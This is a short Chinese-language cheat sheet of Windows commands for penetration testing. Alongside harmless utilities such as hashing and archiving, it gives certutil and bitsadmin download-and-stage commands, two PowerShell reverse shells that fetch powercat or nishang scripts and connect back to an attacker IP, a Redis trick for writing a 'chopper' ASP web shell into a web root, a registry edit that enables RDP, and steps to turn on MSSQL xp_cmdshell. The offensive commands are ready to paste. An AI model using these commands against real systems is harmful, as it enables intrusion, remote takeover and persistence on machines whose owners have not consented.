windows实战常用命令
windows实战常用命令
jar 解压jar包
jar -xvf xxx.jar : 默认解压到当前目录
powershell调用curl
powershell -c curl http://www.baidu.com -UseBasicParsing
windows编为base64
certutil --encode a.txt encode.txt
certutil --decode encode.txt a.txt
windows输出散列值
certutil -hashfile 文件名 sha1/sha256/...
windows 特殊符号转义
利用`进行转义
windows 下载文件
#下载文件
certutil -urlcache -split -f http://example.com/a.txt
#下载文件并编码
certutil -urlcache -split -f http://192.168.1.51/dll.txt dll.txt | certutil -encode dll.txt edll.txt
#适用于windows 7以上版本
bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\\phpstudy_pro\\WWW\\b.ps1"
powershell (new-object Net.WebClient).DownloadFile('http://192.168.203.140/a.ps1','E:\phpstudy_pro\WWW\a.ps1')
windows反弹shell
#powershell反弹cmd,最好将github的下载地址替换为自己的vps
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd
#powershell反弹powershell
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666
系统错误代码
certutil -error 错误代码
windows中的压缩/解压命令
#压缩
makecab e:/test.txt e:/test.zip
#解压,文件夹必须存在
expand e:/test.zip e:/test.txt
expand -F:* test.zip E:\output\
windowsw全局搜索文件
for /r c:/ %i in (*flag*) do @echo %i
dir C:\ /b/s "flag"
redis写入文件
config get dir
config set dir /var/www/
set aa "\n\n\n<%execute request('chopper')%>\n\n\n"
config get dbfilename
config set dbfilename aa.asp
save
注册表开启3389
#开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
#关闭3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
MSSQL命令执行
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell',1
GO
RECONFIGURE
GO
exec xp_cmdshell 'whoami'
